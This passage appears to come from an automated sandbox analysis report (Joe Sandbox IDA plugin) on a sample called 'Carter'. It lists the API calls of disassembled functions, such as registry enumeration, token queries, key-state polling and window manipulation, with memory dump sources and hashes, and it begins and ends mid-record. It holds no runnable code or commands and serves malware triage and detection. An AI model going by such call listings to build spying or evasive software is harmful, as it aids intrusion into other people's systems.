                                                                              • Part of subcall function 00281821: _memmove.LIBCMT ref: 0028185B
                                                                              • Part of subcall function 002CAA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 002CAA6F
                                                                              • Part of subcall function 002CAA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 002CAA82
                                                                              • Part of subcall function 002CAA52: GetCurrentThreadId.KERNEL32 ref: 002CAA89
                                                                              • Part of subcall function 002CAA52: AttachThreadInput.USER32(00000000), ref: 002CAA90
                                                                            • GetFocus.USER32 ref: 002CAC2A
                                                                              • Part of subcall function 002CAA9B: GetParent.USER32(?), ref: 002CAAA9
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 002CAC73
                                                                            • EnumChildWindows.USER32(?,002CACEB), ref: 002CAC9B
                                                                            • __swprintf.LIBCMT ref: 002CACB5
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                            • String ID: %s%d
                                                                            • API String ID: 1941087503-1110647743
                                                                            • Opcode ID: 9bf5c932f7586f7832eb63114c96c53a64f731eb3d07b5b7fc72060b1138dfad
                                                                            • Instruction ID: 556f89ad4ee796de03cb65a5f9f32864b780e074354b2d73a17c6ecdc400477b
                                                                            • Opcode Fuzzy Hash: 9bf5c932f7586f7832eb63114c96c53a64f731eb3d07b5b7fc72060b1138dfad
                                                                            • Instruction Fuzzy Hash: 1311DF74620209ABDF16BFA08D86FEA377CEB44704F00417AFE08AA182CB705965CF71
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?), ref: 002D2318
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpper
                                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                            • API String ID: 3964851224-769500911
                                                                            • Opcode ID: 5c8b352abf8ef204189e1e035ea23c8e7abb3724c0cf9fec1165dced8aae9cbe
                                                                            • Instruction ID: b7e95ba7e55b1823d59429974b960c23c7b4c6605c7cf7bacaaa4c8be741e2cf
                                                                            • Opcode Fuzzy Hash: 5c8b352abf8ef204189e1e035ea23c8e7abb3724c0cf9fec1165dced8aae9cbe
                                                                            • Instruction Fuzzy Hash: 34112A3492012DDFCF44EF94E9914AEB7B8FF29344B1044AAD81567291EB366D2ACF50
                                                                            APIs
                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 002EF2F0
                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 002EF320
                                                                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 002EF453
                                                                            • CloseHandle.KERNEL32(?), ref: 002EF4D4
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                            • String ID:
                                                                            • API String ID: 2364364464-0
                                                                            • Opcode ID: e38e7381aceb63ac94c7153963027b9329ccd953b3999e1faa021644461ac94c
                                                                            • Instruction ID: 9dcd5028e4d1c7c7da6f0cd932baea3ed2bc3ef10ab2415247f87744487a3b6f
                                                                            • Opcode Fuzzy Hash: e38e7381aceb63ac94c7153963027b9329ccd953b3999e1faa021644461ac94c
                                                                            • Instruction Fuzzy Hash: 478190716203019FD721EF29D882F2AB7E5AF48710F54891DFA99DB2D2D7B0AC108F91
                                                                            APIs
                                                                              • Part of subcall function 00281A36: _memmove.LIBCMT ref: 00281A77
                                                                              • Part of subcall function 002F147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002F040D,?,?), ref: 002F1491
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002F075D
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002F079C
                                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 002F07E3
                                                                            • RegCloseKey.ADVAPI32(?,?), ref: 002F080F
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 002F081C
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                            • String ID:
                                                                            • API String ID: 3440857362-0
                                                                            • Opcode ID: d926ee40dbac904dca2ecb72bb450a30943c5734cf077031fcfe7486384053f4
                                                                            • Instruction ID: 21bd5097af9fb731eed060368277d48296a3446f3ae393cd4873eba3f2e5bc35
                                                                            • Opcode Fuzzy Hash: d926ee40dbac904dca2ecb72bb450a30943c5734cf077031fcfe7486384053f4
                                                                            • Instruction Fuzzy Hash: 34515B71228209AFD704EF64C891F7AF7E9AF84344F04892DF59987292DB70E925CF52
                                                                            APIs
                                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 002DEC62
                                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 002DEC8B
                                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 002DECCA
                                                                              • Part of subcall function 00274D37: __itow.LIBCMT ref: 00274D62
                                                                              • Part of subcall function 00274D37: __swprintf.LIBCMT ref: 00274DAC
                                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 002DECEF
                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 002DECF7
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                            • String ID:
                                                                            • API String ID: 1389676194-0
                                                                            • Opcode ID: 6f49477980dbc2d356d6f02ddb32e1f091212da02be6c81bd1d9c17866b9f10e
                                                                            • Instruction ID: c19001d1333854e0959efd18f760305effcd526b48df084fce5e298f8d734cb4
                                                                            • Opcode Fuzzy Hash: 6f49477980dbc2d356d6f02ddb32e1f091212da02be6c81bd1d9c17866b9f10e
                                                                            • Instruction Fuzzy Hash: C4512835A10105DFCF15EF64C985AAEBBF9EF09314F148099E849AB3A1CB31AD61DF50
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 18929ae1354319df09d02563e0e057f2e0cbf185a5001c3eabf00a5d15cef755
                                                                            • Instruction ID: 41b2e32c0a7b7fc5add934f40851cab89bb993b85d3fcc0ff210ee60988c4fd9
                                                                            • Opcode Fuzzy Hash: 18929ae1354319df09d02563e0e057f2e0cbf185a5001c3eabf00a5d15cef755
                                                                            • Instruction Fuzzy Hash: D641E2B592410DAFD724AF28CC84FBDFBB8EB09390F140175EA1AA72D1C770AD61DA51
                                                                            APIs
                                                                            • GetCursorPos.USER32(?), ref: 00272727
                                                                            • ScreenToClient.USER32(003377B0,?), ref: 00272744
                                                                            • GetAsyncKeyState.USER32(00000001), ref: 00272769
                                                                            • GetAsyncKeyState.USER32(00000002), ref: 00272777
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: AsyncState$ClientCursorScreen
                                                                            • String ID:
                                                                            • API String ID: 4210589936-0
                                                                            • Opcode ID: aa7be891d671bd29207cf5ad9362e32b43e816476b35e009f6d32811756f0404
                                                                            • Instruction ID: 4a6eb781bed4e99c934a23a9405ef5888b9d528f2bffe3933f3b503ae78ddc09
                                                                            • Opcode Fuzzy Hash: aa7be891d671bd29207cf5ad9362e32b43e816476b35e009f6d32811756f0404
                                                                            • Instruction Fuzzy Hash: 6B415B3552410AFBDF199F68C944AF9FB74FB06364F20835AF82892290CB30A964DF91
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?), ref: 002C95E8
                                                                            • PostMessageW.USER32(?,00000201,00000001), ref: 002C9692
                                                                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 002C969A
                                                                            • PostMessageW.USER32(?,00000202,00000000), ref: 002C96A8
                                                                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 002C96B0
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePostSleep$RectWindow
                                                                            • String ID:
                                                                            • API String ID: 3382505437-0
                                                                            • Opcode ID: eebdbf4fcea0e40ef3445788797616f6fd91c10068e3fcba6e8b3f30d7b00c39
                                                                            • Instruction ID: 45779e1dda0c743cfc4caab0f1f50dd37c894fa1045c683a41ac68e1d7e8ad06
                                                                            • Opcode Fuzzy Hash: eebdbf4fcea0e40ef3445788797616f6fd91c10068e3fcba6e8b3f30d7b00c39
                                                                            • Instruction Fuzzy Hash: AD31CC7190021AEFDB18CF68D94CF9E7BB9FB44315F204229F924AB2D0C3B09964DB90
                                                                            APIs
                                                                              • Part of subcall function 002729E2: GetWindowLongW.USER32(?,000000EB), ref: 002729F3
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 002FB804
                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 002FB829
                                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 002FB841
                                                                            • GetSystemMetrics.USER32(00000004), ref: 002FB86A
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,002E155C,00000000), ref: 002FB888
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long$MetricsSystem
                                                                            • String ID:
                                                                            • API String ID: 2294984445-0
                                                                            • Opcode ID: ed7040b4e288da3d6fc2b53b0a2677178583c69fbdafd1b7110dd0615415ed17
                                                                            • Instruction ID: 30deaf03509b3f45b75dda3ab0cd3c4cd39ac551301876645ddb9f9d50814d41
                                                                            • Opcode Fuzzy Hash: ed7040b4e288da3d6fc2b53b0a2677178583c69fbdafd1b7110dd0615415ed17
                                                                            • Instruction Fuzzy Hash: 7521967192421AEFCB269F39CC08B75B798FB457A1F144739FA25D65D0D7309820CB80
                                                                            APIs
                                                                            • IsWindow.USER32(00000000), ref: 002E6159
                                                                            • GetForegroundWindow.USER32 ref: 002E6170
                                                                            • GetDC.USER32(00000000), ref: 002E61AC
                                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 002E61B8
                                                                            • ReleaseDC.USER32(00000000,00000003), ref: 002E61F3
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ForegroundPixelRelease
                                                                            • String ID:
                                                                            • API String ID: 4156661090-0
                                                                            • Opcode ID: 5e4a30fdaf58f1605736a486fd70a3ef2692344bd75f8a50cf13f51700f36e43
                                                                            • Instruction ID: 836529f8c256b10cc7bb936c9a97fd07729e1e120fd88327947ce0d2bbdca687
                                                                            • Opcode Fuzzy Hash: 5e4a30fdaf58f1605736a486fd70a3ef2692344bd75f8a50cf13f51700f36e43
                                                                            • Instruction Fuzzy Hash: E821A475A11604EFD714EF65DD88A6AB7F9EF48350F04846AE84A97352CA70AC10CF90
                                                                            APIs
                                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00271729
                                                                            • SelectObject.GDI32(?,00000000), ref: 00271738
                                                                            • BeginPath.GDI32(?), ref: 0027174F
                                                                            • SelectObject.GDI32(?,00000000), ref: 00271778
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ObjectSelect$BeginCreatePath
                                                                            • String ID:
                                                                            • API String ID: 3225163088-0
                                                                            • Opcode ID: 11ccbdcb8e3deae77b03ab4c44a5ae985d3c09e10c87bd767fb6a1d3f46c2e59
                                                                            • Instruction ID: 011f2e5f4ddc5fb8e4610daea5beb30387d45e19676da5901d970600ac6e92e6
                                                                            • Opcode Fuzzy Hash: 11ccbdcb8e3deae77b03ab4c44a5ae985d3c09e10c87bd767fb6a1d3f46c2e59
                                                                            • Instruction Fuzzy Hash: 4D21C870425219EFDB269F28DC897A97BFCFF00311F148216F9199A1A0D77099B5CF90
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _memcmp
                                                                            • String ID:
                                                                            • API String ID: 2931989736-0
                                                                            • Opcode ID: 984e96a6f9431cccf23e9097237f22cabbc392ce77277b9c62aacddc22754b2a
                                                                            • Instruction ID: c1e48dd0f377479c5bbb18446de3f0af51508fd09d10ea59b70a4d2d582dc3ad
                                                                            • Opcode Fuzzy Hash: 984e96a6f9431cccf23e9097237f22cabbc392ce77277b9c62aacddc22754b2a
                                                                            • Instruction Fuzzy Hash: 8A01F573A651063BE603A6119C92FFB731C9E20384F24432DFE0A96381F7A0DE3086E0
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 002D5075
                                                                            • __beginthreadex.LIBCMT ref: 002D5093
                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 002D50A8
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 002D50BE
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 002D50C5
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                            • String ID:
                                                                            • API String ID: 3824534824-0
                                                                            • Opcode ID: 22c46943f6979f18cccbad0c155537e08eb33cf90fd857698aca58cb10020971
                                                                            • Instruction ID: e80f4122769bd7171d8d351c4b8f023550e9624c301b55453ad17aa6e24ffe12
                                                                            • Opcode Fuzzy Hash: 22c46943f6979f18cccbad0c155537e08eb33cf90fd857698aca58cb10020971
                                                                            • Instruction Fuzzy Hash: 061104B6918618BBCB169FA89C48B9B7BACEB49321F14425BF814D3350D6B28D5487F0
                                                                            APIs
                                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002C8E3C
                                                                            • GetLastError.KERNEL32(?,002C8900,?,?,?), ref: 002C8E46
                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,002C8900,?,?,?), ref: 002C8E55
                                                                            • HeapAlloc.KERNEL32(00000000,?,002C8900,?,?,?), ref: 002C8E5C
                                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002C8E73
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 842720411-0
                                                                            • Opcode ID: bf6c04082af03c2a8efab5b8b00fe2dc5348f25d13b6e91d4593f307efe4dda3
                                                                            • Instruction ID: d3ac1464474faf4886054c77b1cde06fb9d2c9ab8d8b66eba96a7e55494f432c
                                                                            • Opcode Fuzzy Hash: bf6c04082af03c2a8efab5b8b00fe2dc5348f25d13b6e91d4593f307efe4dda3
                                                                            • Instruction Fuzzy Hash: 8A018174211209BFDB254FA9DC58E6B7FBDEF89355F10466EF849C2220DB329C10CA60
                                                                            APIs
                                                                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 002D581B
                                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 002D5829
                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 002D5831
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 002D583B
                                                                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 002D5877
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                            • String ID:
                                                                            • API String ID: 2833360925-0
                                                                            • Opcode ID: facc84ce0ed7a598704655f00ebdae896b15ee80a2a59ed0829ecd665f23b772
                                                                            • Instruction ID: 028275aacbd244f36cbe6af26c226d610f2040592111cfcb8fea7ab6234fa189
                                                                            • Opcode Fuzzy Hash: facc84ce0ed7a598704655f00ebdae896b15ee80a2a59ed0829ecd665f23b772
                                                                            • Instruction Fuzzy Hash: BB015735C12A2DDBDF089FE4D858AEDBBBCBB08711F004557E402F2240CBB099A4DBA1
                                                                            APIs
                                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002C8CDE
                                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002C8CE8
                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 002C8CF7
                                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 002C8CFE
                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 002C8D14
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 44706859-0
                                                                            • Opcode ID: 4b7cdcf3af72ea2fe7ba40b9460f45ffc97d198e60fab0f25495b6e666067d59
                                                                            • Instruction ID: 099cfaa636e9f8f02719c27fe56fb7976fc174d7e56159174c8fbba00922da51
                                                                            • Opcode Fuzzy Hash: 4b7cdcf3af72ea2fe7ba40b9460f45ffc97d198e60fab0f25495b6e666067d59
                                                                            • Instruction Fuzzy Hash: 73F0AF34211205AFEB160FB49C88F6B3BACEF49754F10812AF905C2190CA609C10DB60
                                                                            APIs
                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),?,00000000,?), ref: 002C8D3F
                                                                            • GetLastError.KERNEL32(?,TokenPrivileges,?,00000000,?), ref: 002C8D49
